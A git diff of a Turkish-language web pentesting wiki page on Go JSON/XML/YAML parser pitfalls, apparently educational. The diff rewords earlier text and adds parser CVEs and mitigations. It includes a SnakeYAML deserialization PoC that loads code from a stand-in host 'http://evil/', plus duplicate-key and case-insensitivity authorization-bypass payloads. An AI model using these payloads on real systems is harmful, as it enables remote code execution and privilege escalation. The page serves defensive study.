diff --git a/src/pentesting-web/json-xml-yaml-hacking.md b/src/pentesting-web/json-xml-yaml-hacking.md index b3caebc13..9f0740066 100644 --- a/src/pentesting-web/json-xml-yaml-hacking.md +++ b/src/pentesting-web/json-xml-yaml-hacking.md @@ -6,11 +6,11 @@ Aşağıdaki sorunlar Go JSON'da tespit edilmiştir, ancak diğer dillerde de mevcut olabilir. Bu sorunlar [**bu blog yazısında**](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/) yayınlanmıştır. -Go’nun JSON, XML ve YAML ayrıştırıcıları, **kimlik doğrulamayı atlatmak**, **yetkileri yükseltmek** veya **hassas verileri sızdırmak** için kötüye kullanılabilecek uzun bir tutarsızlık ve güvensiz varsayılan ayarlar geçmişine sahiptir. +Go’nun JSON, XML ve YAML ayrıştırıcıları, **kimlik doğrulamasını atlatmak**, **yetkileri yükseltmek** veya **hassas verileri dışa aktarmak** için kötüye kullanılabilecek uzun bir tutarsızlık ve güvensiz varsayılan ayarlar geçmişine sahiptir. ### (Un)Marshaling Beklenmeyen Veriler -Amaç, bir saldırganın hassas alanları okumak/yazmak için izin veren yapıların istismar edilmesidir (örneğin, `IsAdmin`, `Password`). +Amaç, bir saldırganın hassas alanları okumak/yazmak için izin verilen yapıları istismar etmektir (örneğin, `IsAdmin`, `Password`). - Örnek Yapı: ```go @@ -50,9 +50,9 @@ IsAdmin bool `json:"-"` ``` ### Parser Farklılıkları -Amaç, farklı ayrıştırıcıların aynı yükü nasıl farklı yorumladığını istismar ederek yetkilendirmeyi atlatmaktır, örneğin: +Amaç, farklı parser'ların aynı yükü nasıl farklı yorumladığını kullanarak yetkilendirmeyi atlatmaktır, örneğin: - CVE-2017-12635: Tekrar eden anahtarlar aracılığıyla Apache CouchDB atlatması -- 2022: XML ayrıştırıcı tutarsızlığı aracılığıyla Zoom 0-tıklama RCE +- 2022: XML parser tutarsızlığı aracılığıyla Zoom 0-tıklama RCE - GitLab 2025 SAML atlatması aracılığıyla XML tuhaflıkları **1. Tekrar Eden Alanlar:** @@ -61,7 +61,7 @@ Go'nun `encoding/json` **son** alanı alır. json.Unmarshal([]byte(`{"action":"UserAction", "action":"AdminAction"}`), &req) fmt.Println(req.Action) // AdminAction ``` -Diğer ayrıştırıcılar (örneğin, Java'nın Jackson'ı) **ilk** alabilir. +Diğer ayrıştırıcılar (örneğin, Java'nın Jackson'ı) **ilk** olanı alabilir. **2. Büyük/Küçük Harf Duyarsızlığı:** Go büyük/küçük harf duyarsızdır: @@ -98,7 +98,7 @@ Saldırganın kontrol ettiği: - `Accept: application/json` başlığı - JSON gövdesinin kısmi kontrolü -Go'nun XML ayrıştırıcısı **yine de** bunu ayrıştırdı ve enjekte edilen kimliği güvenilir buldu. +Go'nun XML ayrıştırıcısı **yine de** bunu ayrıştırdı ve enjekte edilen kimliğe güvendi. - Özel yük: ```json @@ -113,16 +113,53 @@ Sonuç: - **YAML** ayrıştırıcı: `Action_1` (büyük/küçük harf duyarlı) - **XML** ayrıştırıcı: dize içindeki `"Action_3"`'ü ayrıştırır +--- -### 🔐 Önlemler +## Dikkate Değer Ayrıştırıcı Güvenlik Açıkları (2023-2025) -| Risk | Çözüm | -|-----------------------------|---------------------------------------| -| Bilinmeyen alanlar | `decoder.DisallowUnknownFields()` | -| Tekrarlanan alanlar (JSON) | ❌ stdlib'de çözüm yok | -| Büyük/küçük harf duyarsız eşleşme | ❌ stdlib'de çözüm yok | -| XML atık veriler | ❌ stdlib'de çözüm yok | -| YAML: bilinmeyen anahtarlar | `yaml.KnownFields(true)` | +> Aşağıdaki kamuya açık olarak istismar edilebilen sorunlar, güvensiz ayrıştırmanın çok dilli bir problem olduğunu göstermektedir — sadece bir Go problemi değildir. +### SnakeYAML Deserialization RCE (CVE-2022-1471) + +* Etkileyen: `org.yaml:snakeyaml` < **2.0** (Spring-Boot, Jenkins vb. tarafından kullanılır). +* Temel neden: `new Constructor()` **rastgele Java sınıflarını** ayrıştırır, uzaktan kod yürütme ile sonuçlanan gadget zincirlerine izin verir. +* Tek satırlık PoC (savunmasız hostta hesap makinesini açar): +```yaml +!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ] +``` +* Düzeltme / Önleme: +1. **≥2.0'a Yükseltin** (varsayılan olarak `SafeLoader` kullanır). +2. Eski sürümlerde, açıkça `new Yaml(new SafeConstructor())` kullanın. + +### libyaml Çift Serbest Bırakma (CVE-2024-35325) + +* Etkiler: `libyaml` ≤0.2.5 (birçok dil bağlaması tarafından kullanılan C kütüphanesi). +* Sorun: `yaml_event_delete()` fonksiyonunun iki kez çağrılması, saldırganların DoS veya bazı senaryolarda heap istismarı yapabileceği bir çift serbest bırakmaya yol açar. +* Durum: Üst akış “API kötüye kullanımı” olarak reddetti, ancak Linux dağıtımları, işaretçiyi savunmacı bir şekilde null-serbest bırakan yamanmış **0.2.6** sürümünü gönderdi. + +### RapidJSON Tam Sayı (Alt|Üst)-taşma (CVE-2024-38517 / CVE-2024-39684) + +* Etkiler: Tencent **RapidJSON** `8269bc2` commit'inden önce (<1.1.0-patch-22). +* Hata: `GenericReader::ParseNumber()` içinde kontrolsüz aritmetik, saldırganların büyük sayısal literaller oluşturmasına izin verir; bu literaller sarılır ve heap'i bozar — sonuçta, elde edilen nesne grafiği yetkilendirme kararları için kullanıldığında ayrıcalık yükseltmesine olanak tanır. + +--- + +### 🔐 Önlemler (Güncellenmiş) + +| Risk | Düzeltme / Öneri | +|-------------------------------------|------------------------------------------------------------| +| Bilinmeyen alanlar (JSON) | `decoder.DisallowUnknownFields()` | +| Tekrar eden alanlar (JSON) | ❌ stdlib'de düzeltme yok — [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) ile doğrulayın | +| Büyük/küçük harf duyarsız eşleşme (Go) | ❌ Düzeltme yok — yapı etiketlerini doğrulayın + girdi ön-canonize edin | +| XML çöp verisi / XXE | Sertleştirilmiş bir ayrıştırıcı kullanın (`encoding/xml` + `DisallowDTD`) | +| YAML bilinmeyen anahtarlar | `yaml.KnownFields(true)` | +| **Güvensiz YAML serileştirmesi** | SafeConstructor kullanın / SnakeYAML ≥2.0'a yükseltin | +| libyaml ≤0.2.5 çift serbest bırakma | **0.2.6** veya dağıtım yamanmış sürüme yükseltin | +| RapidJSON